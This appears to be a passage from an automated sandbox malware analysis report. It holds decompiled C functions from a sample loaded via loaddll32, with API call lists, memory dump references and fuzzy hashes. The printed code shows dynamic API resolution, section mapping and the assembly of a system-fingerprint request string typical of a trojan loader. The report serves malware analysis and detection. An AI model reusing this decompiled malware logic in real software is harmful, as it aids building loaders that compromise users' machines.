									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}




























                                                                                                                                                                                                                                    0x00401745
                                                                                                                                                                                                                                    0x0040174e
                                                                                                                                                                                                                                    0x00401753
                                                                                                                                                                                                                                    0x00401759
                                                                                                                                                                                                                                    0x00401762
                                                                                                                                                                                                                                    0x00401768
                                                                                                                                                                                                                                    0x0040176a
                                                                                                                                                                                                                                    0x0040176d
                                                                                                                                                                                                                                    0x00401772
                                                                                                                                                                                                                                    0x00401779
                                                                                                                                                                                                                                    0x00401779
                                                                                                                                                                                                                                    0x0040177d
                                                                                                                                                                                                                                    0x00401785
                                                                                                                                                                                                                                    0x00401788
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040178e
                                                                                                                                                                                                                                    0x00401798
                                                                                                                                                                                                                                    0x0040179a
                                                                                                                                                                                                                                    0x0040179d
                                                                                                                                                                                                                                    0x004017a0
                                                                                                                                                                                                                                    0x004017a4
                                                                                                                                                                                                                                    0x004017ac
                                                                                                                                                                                                                                    0x004017ae
                                                                                                                                                                                                                                    0x004017b1
                                                                                                                                                                                                                                    0x00401819
                                                                                                                                                                                                                                    0x00401819
                                                                                                                                                                                                                                    0x0040181d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004017b6
                                                                                                                                                                                                                                    0x004017bc
                                                                                                                                                                                                                                    0x004017be
                                                                                                                                                                                                                                    0x004017d1
                                                                                                                                                                                                                                    0x004017d4
                                                                                                                                                                                                                                    0x004017d4
                                                                                                                                                                                                                                    0x004017d4
                                                                                                                                                                                                                                    0x004017d8
                                                                                                                                                                                                                                    0x004017c0
                                                                                                                                                                                                                                    0x004017c0
                                                                                                                                                                                                                                    0x004017c8
                                                                                                                                                                                                                                    0x004017ca
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004017ca
                                                                                                                                                                                                                                    0x004017b8
                                                                                                                                                                                                                                    0x004017b8
                                                                                                                                                                                                                                    0x004017cc
                                                                                                                                                                                                                                    0x004017cc
                                                                                                                                                                                                                                    0x004017cc
                                                                                                                                                                                                                                    0x004017db
                                                                                                                                                                                                                                    0x004017de
                                                                                                                                                                                                                                    0x004017e0
                                                                                                                                                                                                                                    0x004017e7
                                                                                                                                                                                                                                    0x004017e2
                                                                                                                                                                                                                                    0x004017e2
                                                                                                                                                                                                                                    0x004017e2
                                                                                                                                                                                                                                    0x004017ef
                                                                                                                                                                                                                                    0x004017f5
                                                                                                                                                                                                                                    0x004017f7
                                                                                                                                                                                                                                    0x00401827
                                                                                                                                                                                                                                    0x004017f9
                                                                                                                                                                                                                                    0x004017f9
                                                                                                                                                                                                                                    0x004017fc
                                                                                                                                                                                                                                    0x004017fe
                                                                                                                                                                                                                                    0x00401806
                                                                                                                                                                                                                                    0x00401806
                                                                                                                                                                                                                                    0x0040180b
                                                                                                                                                                                                                                    0x0040180d
                                                                                                                                                                                                                                    0x00401814
                                                                                                                                                                                                                                    0x00401816
                                                                                                                                                                                                                                    0x00401816
                                                                                                                                                                                                                                    0x00401816
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401816
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004017f7
                                                                                                                                                                                                                                    0x004017a6
                                                                                                                                                                                                                                    0x004017a8
                                                                                                                                                                                                                                    0x004017aa
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004017aa
                                                                                                                                                                                                                                    0x0040182a
                                                                                                                                                                                                                                    0x0040182a
                                                                                                                                                                                                                                    0x00401831
                                                                                                                                                                                                                                    0x00401836
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040183c
                                                                                                                                                                                                                                    0x00401847
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401847
                                                                                                                                                                                                                                    0x0040183e
                                                                                                                                                                                                                                    0x0040183e
                                                                                                                                                                                                                                    0x00401844
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401844
                                                                                                                                                                                                                                    0x00401772
                                                                                                                                                                                                                                    0x00401848
                                                                                                                                                                                                                                    0x0040184d

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 0040177D
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004017EF
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2574300362-0
                                                                                                                                                                                                                                    • Opcode ID: 490eff7fe5a53a3882690b0df239dd75a7ddff08e9cfbb9678ceef9e68b9057d
                                                                                                                                                                                                                                    • Instruction ID: 20e41381af83e98fed74a613c3f7ab7ed5ea214225131684d0572623078a26fe
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 490eff7fe5a53a3882690b0df239dd75a7ddff08e9cfbb9678ceef9e68b9057d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A2310C76A0020A9FDB15CF59C980AAEB7F4BF45315F24807AD805F73A0E778DA41DB58
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00401D9F, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                    			E00401D9F(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                                                                                                                                                                                                                    0x00401db1
                                                                                                                                                                                                                                    0x00401db7
                                                                                                                                                                                                                                    0x00401dc5
                                                                                                                                                                                                                                    0x00401dcc
                                                                                                                                                                                                                                    0x00401dd1
                                                                                                                                                                                                                                    0x00401dd7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401dd8
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401F27,00000002,00000000,?,?,00000000,?,?,00401F27,00000002), ref: 00401DCC
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: SectionView
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1323581903-0
                                                                                                                                                                                                                                    • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                                                    • Instruction ID: d47de4e0d58a28ad62aca0fe1954c9537e19fd45f2cb1026219e244723f4612c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79F012B590020CBFDB119FA5CC85C9FBBBDEB44358F10497AB152E10A0D630AE089A60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F98B94, Relevance: 33.2, APIs: 22, Instructions: 245memorystringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                                                    			E02F98B94(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t101;
				signed int _t105;
				char** _t107;
				int _t110;
				signed int _t112;
				intOrPtr* _t113;
				intOrPtr* _t115;
				intOrPtr* _t117;
				intOrPtr* _t119;
				intOrPtr _t122;
				intOrPtr _t127;
				int _t131;
				CHAR* _t133;
				intOrPtr _t134;
				void* _t135;
				void* _t144;
				int _t145;
				void* _t146;
				intOrPtr _t147;
				void* _t149;
				long _t153;
				intOrPtr* _t154;
				intOrPtr* _t155;
				intOrPtr* _t158;
				void* _t159;
				void* _t161;

				_t144 = __edx;
				_t135 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x2f9d018; // 0x99d5691b
				asm("bswap eax");
				_t61 =  *0x2f9d014; // 0x3a87c8cd
				_t133 = _a16;
				asm("bswap eax");
				_t62 =  *0x2f9d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x2f9d00c; // 0x62819102
				asm("bswap eax");
				_t64 =  *0x2f9d27c; // 0x44a5a8
				_t3 = _t64 + 0x2f9e633; // 0x74666f73
				_t145 = wsprintfA(_t133, _t3, 3, 0x3d14b, _t63, _t62, _t61, _t60,  *0x2f9d02c,  *0x2f9d004, _t59);
				_t67 = E02F91C1A();
				_t68 =  *0x2f9d27c; // 0x44a5a8
				_t4 = _t68 + 0x2f9e673; // 0x74707526
				_t71 = wsprintfA(_t145 + _t133, _t4, _t67);
				_t161 = _t159 + 0x38;
				_t146 = _t145 + _t71; // executed
				_t72 = E02F954BC(_t135); // executed
				_t134 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t127 =  *0x2f9d27c; // 0x44a5a8
					_t7 = _t127 + 0x2f9e8eb; // 0x736e6426
					_t131 = wsprintfA(_a16 + _t146, _t7, _t72);
					_t161 = _t161 + 0xc;
					_t146 = _t146 + _t131;
					HeapFree( *0x2f9d238, 0, _v8);
				}
				_t73 = E02F97649();
				_v8 = _t73;
				if(_t73 != 0) {
					_t122 =  *0x2f9d27c; // 0x44a5a8
					_t11 = _t122 + 0x2f9e8f3; // 0x6f687726
					wsprintfA(_t146 + _a16, _t11, _t73);
					_t161 = _t161 + 0xc;
					HeapFree( *0x2f9d238, 0, _v8);
				}
				_t147 =  *0x2f9d32c; // 0x33e95b0
				_t75 = E02F99395(0x2f9d00a, _t147 + 4);
				_t153 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					RtlFreeHeap( *0x2f9d238, _t153, _a16); // executed
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x2f9d238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x2f9d238, _t153, _v20);
						goto L26;
					}
					E02F97A80(GetTickCount());
					_t82 =  *0x2f9d32c; // 0x33e95b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x2f9d32c; // 0x33e95b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x2f9d32c; // 0x33e95b0
					_t149 = E02F98307(1, _t144, _a16,  *_t88);
					_v28 = _t149;
					asm("lock xadd [eax], ecx");
					if(_t149 == 0) {
						L24:
						HeapFree( *0x2f9d238, _t153, _v8);
						goto L25;
					}
					StrTrimA(_t149, 0x2f9c2ac);
					_push(_t149);
					_t94 = E02F93CC8();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x2f9d238, _t153, _t149);
						goto L24;
					}
					_t154 = __imp__;
					 *_t154(_t149, _a4);
					 *_t154(_v8, _v20);
					_t155 = __imp__;
					 *_t155(_v8, _v16);
					 *_t155(_v8, _t149);
					_t101 = E02F9809F(0, _v8);
					_a4 = _t101;
					if(_t101 == 0) {
						_v12 = 8;
						L21:
						E02F9A1B0();
						L22:
						HeapFree( *0x2f9d238, 0, _v16);
						_t153 = 0;
						goto L23;
					}
					_t105 = E02F943DF(_t134, 0xffffffffffffffff, _t149,  &_v24); // executed
					_v12 = _t105;
					if(_t105 == 0) {
						_t158 = _v24;
						_t112 = E02F9163F(_t158, _a4, _a8, _a12); // executed
						_v12 = _t112;
						_t113 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t113 + 0x80))(_t113);
						_t115 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t115 + 8))(_t115);
						_t117 =  *((intOrPtr*)(_t158 + 4));
						 *((intOrPtr*)( *_t117 + 8))(_t117);
						_t119 =  *_t158;
						 *((intOrPtr*)( *_t119 + 8))(_t119);
						E02F99039(_t158);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t107 = _a8;
							if(_t107 != 0) {
								_t150 =  *_t107;
								_t156 =  *_a12;
								wcstombs( *_t107,  *_t107,  *_a12);
								_t110 = E02F985DB(_t150, _t150, _t156 >> 1);
								_t149 = _v28;
								 *_a12 = _t110;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E02F99039(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}






















































                                                                                                                                                                                                                                    0x02f98b94
                                                                                                                                                                                                                                    0x02f98b94
                                                                                                                                                                                                                                    0x02f98b94
                                                                                                                                                                                                                                    0x02f98b9f
                                                                                                                                                                                                                                    0x02f98ba6
                                                                                                                                                                                                                                    0x02f98ba8
                                                                                                                                                                                                                                    0x02f98ba8
                                                                                                                                                                                                                                    0x02f98bb5
                                                                                                                                                                                                                                    0x02f98bc0
                                                                                                                                                                                                                                    0x02f98bc3
                                                                                                                                                                                                                                    0x02f98bc8
                                                                                                                                                                                                                                    0x02f98bd1
                                                                                                                                                                                                                                    0x02f98bd4
                                                                                                                                                                                                                                    0x02f98bd9
                                                                                                                                                                                                                                    0x02f98bdc
                                                                                                                                                                                                                                    0x02f98be1
                                                                                                                                                                                                                                    0x02f98be4
                                                                                                                                                                                                                                    0x02f98bf0
                                                                                                                                                                                                                                    0x02f98bfd
                                                                                                                                                                                                                                    0x02f98bff
                                                                                                                                                                                                                                    0x02f98c05
                                                                                                                                                                                                                                    0x02f98c0a
                                                                                                                                                                                                                                    0x02f98c15
                                                                                                                                                                                                                                    0x02f98c17
                                                                                                                                                                                                                                    0x02f98c1a
                                                                                                                                                                                                                                    0x02f98c1c
                                                                                                                                                                                                                                    0x02f98c23
                                                                                                                                                                                                                                    0x02f98c29
                                                                                                                                                                                                                                    0x02f98c2c
                                                                                                                                                                                                                                    0x02f98c2f
                                                                                                                                                                                                                                    0x02f98c34
                                                                                                                                                                                                                                    0x02f98c41
                                                                                                                                                                                                                                    0x02f98c43
                                                                                                                                                                                                                                    0x02f98c49
                                                                                                                                                                                                                                    0x02f98c53
                                                                                                                                                                                                                                    0x02f98c53
                                                                                                                                                                                                                                    0x02f98c55
                                                                                                                                                                                                                                    0x02f98c5c
                                                                                                                                                                                                                                    0x02f98c5f
                                                                                                                                                                                                                                    0x02f98c62
                                                                                                                                                                                                                                    0x02f98c67
                                                                                                                                                                                                                                    0x02f98c74
                                                                                                                                                                                                                                    0x02f98c76
                                                                                                                                                                                                                                    0x02f98c84
                                                                                                                                                                                                                                    0x02f98c84
                                                                                                                                                                                                                                    0x02f98c86
                                                                                                                                                                                                                                    0x02f98c94
                                                                                                                                                                                                                                    0x02f98c99
                                                                                                                                                                                                                                    0x02f98c9d
                                                                                                                                                                                                                                    0x02f98ca0
                                                                                                                                                                                                                                    0x02f98e63
                                                                                                                                                                                                                                    0x02f98e6d
                                                                                                                                                                                                                                    0x02f98e76
                                                                                                                                                                                                                                    0x02f98ca6
                                                                                                                                                                                                                                    0x02f98cb2
                                                                                                                                                                                                                                    0x02f98cba
                                                                                                                                                                                                                                    0x02f98cbd
                                                                                                                                                                                                                                    0x02f98e57
                                                                                                                                                                                                                                    0x02f98e61
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f98e61
                                                                                                                                                                                                                                    0x02f98cc9
                                                                                                                                                                                                                                    0x02f98cce
                                                                                                                                                                                                                                    0x02f98cd7
                                                                                                                                                                                                                                    0x02f98ce8
                                                                                                                                                                                                                                    0x02f98cec
                                                                                                                                                                                                                                    0x02f98cf5
                                                                                                                                                                                                                                    0x02f98cfb
                                                                                                                                                                                                                                    0x02f98d0a
                                                                                                                                                                                                                                    0x02f98d11
                                                                                                                                                                                                                                    0x02f98d1a
                                                                                                                                                                                                                                    0x02f98d20
                                                                                                                                                                                                                                    0x02f98e4b
                                                                                                                                                                                                                                    0x02f98e55
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f98e55
                                                                                                                                                                                                                                    0x02f98d2c
                                                                                                                                                                                                                                    0x02f98d32
                                                                                                                                                                                                                                    0x02f98d33
                                                                                                                                                                                                                                    0x02f98d3a
                                                                                                                                                                                                                                    0x02f98d3d
                                                                                                                                                                                                                                    0x02f98e41
                                                                                                                                                                                                                                    0x02f98e49
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f98e49
                                                                                                                                                                                                                                    0x02f98d46
                                                                                                                                                                                                                                    0x02f98d4d
                                                                                                                                                                                                                                    0x02f98d55
                                                                                                                                                                                                                                    0x02f98d5a
                                                                                                                                                                                                                                    0x02f98d63
                                                                                                                                                                                                                                    0x02f98d69
                                                                                                                                                                                                                                    0x02f98d70
                                                                                                                                                                                                                                    0x02f98d77
                                                                                                                                                                                                                                    0x02f98d7a
                                                                                                                                                                                                                                    0x02f98e79
                                                                                                                                                                                                                                    0x02f98e2d
                                                                                                                                                                                                                                    0x02f98e2d
                                                                                                                                                                                                                                    0x02f98e32
                                                                                                                                                                                                                                    0x02f98e3d
                                                                                                                                                                                                                                    0x02f98e3f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f98e3f
                                                                                                                                                                                                                                    0x02f98d84
                                                                                                                                                                                                                                    0x02f98d8b
                                                                                                                                                                                                                                    0x02f98d8e
                                                                                                                                                                                                                                    0x02f98d93
                                                                                                                                                                                                                                    0x02f98d9e
                                                                                                                                                                                                                                    0x02f98da3
                                                                                                                                                                                                                                    0x02f98da6
                                                                                                                                                                                                                                    0x02f98dac
                                                                                                                                                                                                                                    0x02f98db2
                                                                                                                                                                                                                                    0x02f98db8
                                                                                                                                                                                                                                    0x02f98dbb
                                                                                                                                                                                                                                    0x02f98dc1
                                                                                                                                                                                                                                    0x02f98dc4
                                                                                                                                                                                                                                    0x02f98dc9
                                                                                                                                                                                                                                    0x02f98dcd
                                                                                                                                                                                                                                    0x02f98dcd
                                                                                                                                                                                                                                    0x02f98dd9
                                                                                                                                                                                                                                    0x02f98de5
                                                                                                                                                                                                                                    0x02f98de9
                                                                                                                                                                                                                                    0x02f98deb
                                                                                                                                                                                                                                    0x02f98df0
                                                                                                                                                                                                                                    0x02f98df2
                                                                                                                                                                                                                                    0x02f98df7
                                                                                                                                                                                                                                    0x02f98dfc
                                                                                                                                                                                                                                    0x02f98e09
                                                                                                                                                                                                                                    0x02f98e11
                                                                                                                                                                                                                                    0x02f98e14
                                                                                                                                                                                                                                    0x02f98e14
                                                                                                                                                                                                                                    0x02f98df0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f98ddb
                                                                                                                                                                                                                                    0x02f98ddf
                                                                                                                                                                                                                                    0x02f98e16
                                                                                                                                                                                                                                    0x02f98e19
                                                                                                                                                                                                                                    0x02f98e22
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f98e22
                                                                                                                                                                                                                                    0x02f98de1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f98de1
                                                                                                                                                                                                                                    0x02f98dd9

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02F98BA8
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 02F98BF8
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 02F98C15
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 02F98C41
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 02F98C53
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 02F98C74
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 02F98C84
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02F98CB2
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02F98CC3
                                                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(033E9570), ref: 02F98CD7
                                                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(033E9570), ref: 02F98CF5
                                                                                                                                                                                                                                      • Part of subcall function 02F98307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,73FCC740,?,?,02F9A428,?,033E95B0), ref: 02F98332
                                                                                                                                                                                                                                      • Part of subcall function 02F98307: lstrlen.KERNEL32(?,?,?,02F9A428,?,033E95B0), ref: 02F9833A
                                                                                                                                                                                                                                      • Part of subcall function 02F98307: strcpy.NTDLL ref: 02F98351
                                                                                                                                                                                                                                      • Part of subcall function 02F98307: lstrcat.KERNEL32(00000000,?), ref: 02F9835C
                                                                                                                                                                                                                                      • Part of subcall function 02F98307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02F9A428,?,033E95B0), ref: 02F98379
                                                                                                                                                                                                                                    • StrTrimA.SHLWAPI(00000000,02F9C2AC,?,033E95B0), ref: 02F98D2C
                                                                                                                                                                                                                                      • Part of subcall function 02F93CC8: lstrlen.KERNEL32(033E87FA,00000000,00000000,73FCC740,02F9A453,00000000), ref: 02F93CD8
                                                                                                                                                                                                                                      • Part of subcall function 02F93CC8: lstrlen.KERNEL32(?), ref: 02F93CE0
                                                                                                                                                                                                                                      • Part of subcall function 02F93CC8: lstrcpy.KERNEL32(00000000,033E87FA), ref: 02F93CF4
                                                                                                                                                                                                                                      • Part of subcall function 02F93CC8: lstrcat.KERNEL32(00000000,?), ref: 02F93CFF
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02F98D4D
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,?), ref: 02F98D55
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 02F98D63
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02F98D69
                                                                                                                                                                                                                                      • Part of subcall function 02F9809F: lstrlen.KERNEL32(?,00000000,02F9D330,00000001,02F92200,02F9D00C,02F9D00C,00000000,00000005,00000000,00000000,?,?,?,02F996C1,02F923E9), ref: 02F980A8
                                                                                                                                                                                                                                      • Part of subcall function 02F9809F: mbstowcs.NTDLL ref: 02F980CF
                                                                                                                                                                                                                                      • Part of subcall function 02F9809F: memset.NTDLL ref: 02F980E1
                                                                                                                                                                                                                                    • wcstombs.NTDLL ref: 02F98DFC
                                                                                                                                                                                                                                      • Part of subcall function 02F9163F: SysAllocString.OLEAUT32(?), ref: 02F91680
                                                                                                                                                                                                                                      • Part of subcall function 02F9163F: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 02F91702
                                                                                                                                                                                                                                      • Part of subcall function 02F9163F: StrStrIW.SHLWAPI(?,006E0069), ref: 02F91741
                                                                                                                                                                                                                                      • Part of subcall function 02F99039: HeapFree.KERNEL32(00000000,00000000,02F97F18,00000000,?,?,00000000), ref: 02F99045
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?), ref: 02F98E3D
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02F98E49
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,033E95B0), ref: 02F98E55
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 02F98E61
                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,?), ref: 02F98E6D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 603507560-0
                                                                                                                                                                                                                                    • Opcode ID: 85333cb2fb22596e86b84c32f677edcccfcfb204bae597f19db6f64beb815d71
                                                                                                                                                                                                                                    • Instruction ID: dd3653c3a4d37d344af2df03991edc31e0b35d8ebbd63c2e0e6d844a7e681f06
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85333cb2fb22596e86b84c32f677edcccfcfb204bae597f19db6f64beb815d71
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5912771D40208AFEF11EFA4DC88A9ABBB9EF097D0F244855E609D7260D7319961DF60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F9ADE5, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
